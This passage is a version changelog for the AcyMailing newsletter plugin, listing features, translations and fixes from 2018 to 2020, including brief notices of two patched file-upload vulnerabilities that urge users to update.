    *   A new "revealonline" CSS class is now available, to hide something in the receiver's mailbox and show it on the online version
    *   New full Serbian translation
    *   Translation update and corrections for Danish, German, Finnish, French, Norwegian, Romanian, Russian, Slovenian, Swedish, Turkish and Ukrainian
    
    **Bug fixes**
    
*   **AcyMailing 5.10.14**
    
    May 13, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.10.2**
    
    April 21, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.10.1**
    
    April 7, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.10.0**
    
    April 6, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.9.2**
    
    March 23, 2020
    
    Vulnerability on file upload fixed when having admin access to AcyMailing pages. Any wrong file uploaded will be cleaned during the update process.  
    We strongly recommend to update AcyMailing as soon as possible, more information will be added in the related CVE
    
    **Bug fixes**
    
*   **AcyMailing 6.9**
    
    March 9, 2020
    
    **Improvements**
    
    *   The user import choices are now stored
    *   Greatly improved performances on the click tracking system, emails should be sent much faster
    *   Added the "hideonline" CSS class on emails. When added on an element, it will be hidden on the archive and "View it online" link
    *   Added the click statistics on the campaigns listing
    *   The detailed statistics are now no longer ordered randomly if the sending date is the same for every user
    *   You can now search multiple words in the dropdown fields (like the mail selection dropdown in the statistics page)
    *   Improved the "Check database integrity" feature to clean data from some AcyMailing tables, and translate result
    *   Improved the way custom fields are displayed when inserted in an email, for dropdown, radio and checkbox fields
    *   The welcome email is now not sent when the user isn’t active
    *   Better display for the "Send settings" step of campaigns
    *   Queued emails are now automatically removed for inactive users two days after the sending date
    *   \[addon\] New add-on for ICagenda, event insertion and user filter by event subscription
    *   \[addon\] Added compatibility with HikaShop 4
    *   Added multi-language compatibility when inserting articles in emails (for the link applied on the title)
    *   Tracked links are not processed by the sef system anymore, for special sef extension compatibility
    *   Improved the router for a better compatibility with the Joomla sef system on unsubscribe and online links, for multi-language sites
    *   AcyMailing will now instantly know it when you attached your website to your license when trying to update in WordPress
    *   A better url is used for the "Terms and conditions" post
    *   Code adaptation for WordPress standards
    *   Added compatibility with the plugin Schema and structured data for wp
    *   More translations for Chinese, Norwegian, Romanian, Slovenian
    *   Full Swedish translation
    
    **Bug fixes**
    
*   **AcyMailing 5.10.13**
    
    March 3, 2020
    
    **Modifications**
    
*   **AcyMailing 6.8**
    
    February 3, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.7**
    
    January 13, 2020
    
    **New features****Improvements**
    
    *   Editor: auto-hide the test zone if the email is successfully sent
    *   Editor: the title is now added on inserted images
    *   Editor: when inserting a separator, a new option lets you add some space below and above
    *   Editor: the drag & drop editor now opens in full screen mode
    *   Better interface for the "Test" step of the Campaign's edition page
    *   Improved the AcyMailing left menu when the window is resized
    *   Improved the AcyMailing header's display on small screens and tablets
    *   "Cancel" buttons have been added on multiple edition pages (List, user, bounce rule, custom field...)
    *   The add-ons are now ordered alphabetically for an easier search
    *   Improved performances on style and script loading for each AcyMailing page
    *   The FontAwesome library isn't loaded anymore, used fonts are now embed in AcyMailing to improve the page load speed
    *   New option in the mail configuration to disable automatic hyphens in paragraphs for sent emails
    *   New option to show the site's header on the unsubscribe page
    *   The "Bounce email address" option is now available in the free version in the "Mail settings" tab of the configuration
    *   In the bounce handling system, you can now connect to a mailbox using the "Pop3 without imap extension" method
    *   The "source" is automatically completed when a new AcyMailing user is created
    *   Automations: added a confirmation when deleting an email in the "Add an email in the queue" action
    *   Translation improvements: German, French, Hungarian, Norwegian, Russian, Turkish, Ukrainian
    *   New full translation: Slovenian
    
    **Bug fixes**
    
*   **AcyMailing 5.10.12**
    
    January 10, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.6.0**
    
    December 2, 2019
    
    **New features****Improvements**
    
    *   All the add-ons now have options for the automatic campaigns to automatically send the new content to your users
    *   Better alignment for Follow buttons in Outlook 2007 - 2010
    *   Better UX for the list's edition page
    *   The shown statistics numbers are now consistent in the campaigns listing and the statistics page
    *   In some mail clients, a 1px border may appear around your emails, this is no longer the case
    *   The mobile preview has been inproved, and no more double scrollbar
    *   The default templates have been remade to include this version's improvements
    *   The campaign's settings are now applied on the dynamic content inserted in your emails (like the site's articles/posts)
    *   Improved the campaigns edition page display and removed the hint popup
    *   Compatibility with the GDPR plugin
    *   The Add-ons menu is now translated in the Joomla menu
    *   The "Price text" field is now taken into account in the EventBooking add-on
    *   New partial translations, imported from AcyMailing 5: Arabic, Bosnian, Bulgarian, Catalan, Chinese, Croatian, Estonian, Finnish, Galician, Hebrew, Icelandic, Indonesian, Japanese, Latvian, Lithuanian, Macedonian, Persian, Serbian, Sindhi, Swahili, Thai, Urdu, Vietnamese, Welsh
    
    **Bug fixes**
    
*   **AcyMailing 5.10.11**
    
    November 27, 2019
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.5.0**
    
    November 5, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.4.0**
    
    October 14, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.3.1**
    
    September 25, 2019
    
    **Bug fixes**
    
*   **AcyMailing 6.3.0**
    
    September 23, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.2.2**
    
    August 30, 2019
    
    This is a patch release to address a security issue on the file upload custom field. We highly recommend to update to the v6.2.2 as soon as possible for websites matching all of the following conditions:
    
    *   The Enterprise edition of AcyMailing is used
    *   The version 6.2.0 or 6.2.1 is used
    *   A "File" custom field is created and visible for the users in a front-end subscription form (the module on Joomla or the widget on WordPress)
    *   An other custom field other than a "File" field must be displayed on the form, in addition to the "Name", "Email" and "File" fields
    
    If your website doesn't match one of these conditions it is not concerned by the security issue, but we still recommend you to keep AcyMailing updated when a new version is available.
    
*   **AcyMailing 5.10.10**
    
    August 28, 2019
    
    **Improvements and bug fixes**
    
*   **AcyMailing 6.2.1**
    
    August 27, 2019
    
    **Improvements and bug fixes**
    
*   **AcyMailing 6.2.0**
    
    August 20, 2019
    
    **New features and improvements****Bug fixes**
    
*   **AcyMailing 6.1.10**
    
    August 5, 2019
    
    **Bug fixes**
    
*   **AcyMailing 5.10.9**
    
    July 31, 2019
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.1.9**
    
    July 30, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.8**
    
    July 15, 2019
    
    There aren't much modifications in this version, but it had to be released as the "Send settings" step of the campaigns edition workflow could be blocked in some cases when scheduling the campaign, saving as draft then returning on this step.
    
    **Modifications**
    
*   **AcyMailing 6.1.7**
    
    July 8, 2019
    
    **Improvements****Bug fixes****Integrations**
    
*   **AcyMailing 6.1.6**
    
    June 18, 2019
    
    This version is mainly an improvements and maintenance release, mainly focusing on the editor and sent emails.
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 5.10.8**
    
    June 18, 2019
    
    **Improvements****Bug fixes****Plugins**
    
*   **AcyMailing 6.1.5**
    
    June 3, 2019
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.4**
    
    April 23, 2019
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.3**
    
    April 2, 2019
    
*   **AcyMailing 5.10.7**
    
    March 25, 2019
    
*   **AcyMailing 5.10.6**
    
    March 18, 2019
    
*   **AcyMailing 6.1.2**
    
    March 11, 2019
    
*   **AcyMailing 6.1.1**
    
    February 13, 2019
    
*   **AcyMailing 6.0.4**
    
    February 6, 2019
    
*   **AcyMailing 5.10.5**
    
    January 10, 2019
    
*   **AcyMailing 6.0.3**
    
    January 9, 2019
    
*   **AcyMailing 6.0.2**
    
    December 17, 2018
    
*   **AcyMailing 6.0.1**
    
    November 28, 2018
    
*   **AcyMailing 6 Beta**
    
    November 19, 2018
    
*   **AcyMailing 6 Alpha 3**
    
    October 2, 2018
    
*   **AcyMailing 6 Alpha 2**
    
    August 29, 2018
    
*   **AcyMailing 6 Alpha 1**
    
    August 22, 2018

Tag

#php